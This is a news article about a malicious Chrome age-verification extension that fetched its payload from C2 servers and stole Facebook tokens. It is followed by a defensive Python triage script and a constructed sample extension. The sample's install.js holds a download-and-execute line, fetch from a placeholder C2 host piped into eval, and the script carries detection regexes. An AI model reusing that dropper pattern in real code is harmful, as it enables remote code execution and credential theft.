Ever wonder how your mild-mannered friend’s Facebook feed suddenly got packed with lewd clickbait? That’s the question Maxime Kjaer was determined to answer when he noticed a friend’s Facebook feed peppered with Likes for sketchy link bait such as “Basic Kissing Tips”.

“Intrigued, I decided to go down the rabbit hole and see what this was all about,” wrote Kjaer, a 19-year-old computer science student at the Swiss Federal Institute of Technology in Switzerland, in a blog post Monday.

What he found was what he called a “glaring security hole” in the Google Chrome Webstore that allowed malware authors to infect Chrome browsers via a bogus age verification extension. The malware-laced extension, called “Viral Content Age Verify”, allowed a third party to “read and change all your data on the websites you visit” and potentially “read your emails, steal all your login credentials, have you DDoS someone, mine Bitcoin, seed pirated content… You name it. That even includes reading and leaking your credit card information, if you ever are to type that in,” Kjaer describes.

Going down the rabbit hole began with clicking Like on one of his Facebook friend’s “semi-raunchy” Liked items. As soon as he did, he was asked to verify his age by installing the Viral Content Age Verify Chrome browser extension.

By agreeing to install the extension, Kjaer watched as a metadata file called manifest.json began to run through three scripts (background.js, query-string.js and install.js). Both the background.js and query-string.js scripts are innocuous. However, the install.js script fetches the malware payload from two hard-coded URLs. “The first URL is to get instructions from a server (C2), and the second one is to report back to it,” he wrote.

Post-script execution, the C2’s instructions were to steal access tokens (the equivalent of having your username and password) for Facebook so the malware authors can control your Facebook account. The first step for malware authors with a hijacked Facebook account was to Like a Facebook page called VVideosss. While Kjaer said the malware functions that he documented were Facebook specific, he noted that the credential-stealing function also applied to YouTube.

Once credentials are collected, he observed, the malware sends back to the C2 information identifying the infected machine, what version of the age verification extension you are running and whether or not you are currently logged into Facebook.

All together, Kjaer said there were nine identical variations of the Viral Content Age Verify extension on the Google Chrome Webstore with a cumulative total of 132,265 users.

Kjaer notified both Google and the C2 servers’ hosting company, DigitalOcean, of the malware. Both Google and the hosting firm took immediate action, taking down the servers and blacklisting the extensions. “All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me,” Kjaer wrote.

Google did not immediately respond to Threatpost’s request for comment, but the company did reply to Kjaer and confirmed it blacklisted the Age Verification extensions. Will Harris, a member of Chrome’s Security team, told Kjaer that when extensions are blacklisted they are also automatically removed from users’ computers: “Extensions that are blacklisted in the Chrome web store do get automatically removed from all users who have them installed.”

Kjaer commended Google’s move but still blasted the company for its approach to Chrome extension security. “The fact is that the current malware detection on the Chrome Webstore is a joke,” he wrote. “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it.”
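The install.js pattern described above, a background script that pulls its payload from hard-coded URLs after installation rather than shipping it in the package, is exactly what a store-side scan of the packaged files misses, but it is cheap to flag in triage of an unpacked extension. The following is an added example, not Kjaer's code or the extension's; the sample extension contents and the `.invalid` placeholder C2 URLs are constructed, with only the three script names taken from the article.

```python
"""Triage heuristic for an unpacked Chrome extension: flag background scripts that
pull data from hard-coded remote URLs into a code sink (payload fetched at install
time instead of shipped in the package)."""
import json
import re

FETCH_RE = re.compile(r"\bfetch\s*\(|\bXMLHttpRequest\b")      # runtime network calls
URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")        # hard-coded endpoints
SINK_RE = re.compile(                                          # text -> executable code
    r"\beval\s*\(|\bnew\s+Function\s*\(|executeScript\s*\(\s*\{[^}]*\bcode\s*:")

def background_scripts(manifest):
    """Background scripts declared by the manifest (MV2 'scripts' or MV3 'service_worker')."""
    bg = manifest.get("background", {})
    return list(bg.get("scripts", [])) + ([bg["service_worker"]] if "service_worker" in bg else [])

def triage_extension(files):
    """files maps file name -> source text. Returns one finding per background script
    that references a hard-coded URL, makes a network call and feeds a code sink."""
    manifest = json.loads(files["manifest.json"])
    findings = []
    for name in background_scripts(manifest):
        src = files.get(name, "")
        urls = URL_RE.findall(src)
        if urls and FETCH_RE.search(src) and SINK_RE.search(src):
            findings.append({"script": name, "urls": urls,
                             "broad_host_access": "<all_urls>" in manifest.get("permissions", [])})
    return findings

# Constructed sample (not the real extension's code): the three-script layout the
# article describes, with placeholder C2 URLs, so the check runs offline.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({"manifest_version": 2, "permissions": ["<all_urls>", "tabs"],
        "background": {"scripts": ["background.js", "query-string.js", "install.js"]}}),
    "background.js": "chrome.runtime.onInstalled.addListener(() => console.log('ready'));",
    "query-string.js": "function parse(q) { return Object.fromEntries(new URLSearchParams(q)); }",
    "install.js": ("const C2 = 'https://c2-placeholder.invalid/instructions';\n"
                   "const REPORT = 'https://c2-placeholder.invalid/report';\n"
                   "fetch(C2).then(r => r.text()).then(code => eval(code));\n"),
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_EXTENSION), indent=2))
```

A script that only contacts a URL (telemetry, update checks) is not flagged; the finding requires the fetch-to-code-sink combination, which is what distinguishes a dropper from ordinary network use.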